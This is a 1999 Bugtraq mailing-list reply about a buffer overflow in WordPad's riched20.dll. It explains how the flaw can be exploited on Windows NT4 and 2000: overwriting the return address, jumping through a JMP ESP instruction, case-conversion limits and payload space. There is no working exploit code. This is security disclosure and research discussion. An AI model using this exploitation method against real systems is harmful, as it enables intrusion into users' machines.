Bugtraq mailing list archives
Re: WordPad/riched20.dll buffer overflow
From: mnemonix () GLOBALNET CO UK (Mnemonix)
Date: Sat, 20 Nov 1999 00:43:26 -0000
----- Original Message ----- From: "Gerardo Richarte" <core.lists.bugtraq () CORE-SDI COM> To: <BUGTRAQ () SECURITYFOCUS COM> Sent: Thursday, November 18, 1999 9:45 PM Subject: Re: WordPad/riched20.dll buffer overflow <SNIP>
I've been trying to determine if it's exploitable, and couldn't reproduce what you described. I want to know if there is some other information I need to know... here is what I tried: an rtf file with {\rtf\AAAAAAAAA...} a lot of As (tryed 32,49,1000,2000,... 5000... 20000)
<SNIP>
could anybody reproduce this bug?
This is exploitable. On both Windows NT4 and Windows 2000 the payload can be found at the ESP - but there is a difference between the two OSs. NT 4 seems to do a tolower() on the string turning "AAAA" to "aaaa" where as Windows 2000 preserves the case. Both OS's have the return address over-written so all you have do do is find an instruction in the memory space that does a JMP ESP - there are quite a few floating around the place. On NT 4 if any of the bytes for the exploit code or return address are < 0x61 then they'll be turned into the uppercase version ie 0x41 -> 0x61 so anyone writing an exploit for NT will have to be cunning. On Win2K there is not this problem. For both OSs from the ESP you'll get around 152 bytes of room to put your exploit code in. For anyone interested in NT buffer overruns some useful docs on the subject can be found at http://www.infowar.co.uk/mnemonix Cheers, David Litchfield
Current thread:
- NTmail and VRFY, (continued)
- NTmail and VRFY George (Nov 30)
- Netscape Communicator 4.7 - Navigator Overflows Mike Boto (Nov 27)
- Re: WordPad/riched20.dll buffer overflow Crispin Cowan (Nov 27)
- Re: WordPad/riched20.dll buffer overflow Solar Designer (Nov 29)
- Re: WordPad/riched20.dll buffer overflow Casper Dik (Nov 30)
- Default IE 5.0 security settings allow frame spoofing Georgi Guninski (Nov 30)
- Re: WordPad/riched20.dll buffer overflow Jason Spence (Nov 28)
- TooRcon Computer Security Expo Announces Pre-Registration Ben (Nov 28)
- Re: WordPad/riched20.dll buffer overflow User SCOTT (Nov 18)
- Re: WordPad/riched20.dll buffer overflow - Full Details Solar Eclipse (Nov 21)
- Re: WordPad/riched20.dll buffer overflow Mnemonix (Nov 19)
- Re: WordPad/riched20.dll buffer overflow Solar Eclipse (Nov 22)
- Re: WordPad/riched20.dll buffer overflow Ron Parker (Nov 23)
- Re: WordPad/riched20.dll buffer overflow Solar Eclipse (Nov 22)
- Re: WordPad/riched20.dll buffer overflow Ussr Labs (Nov 19)
- Re: WordPad/riched20.dll buffer overflow Thomas Dullien (Nov 23)
- Re: WordPad/riched20.dll buffer overflow Mnemonix (Nov 23)
- Re: WordPad/riched20.dll buffer overflow Ussr Labs (Nov 23)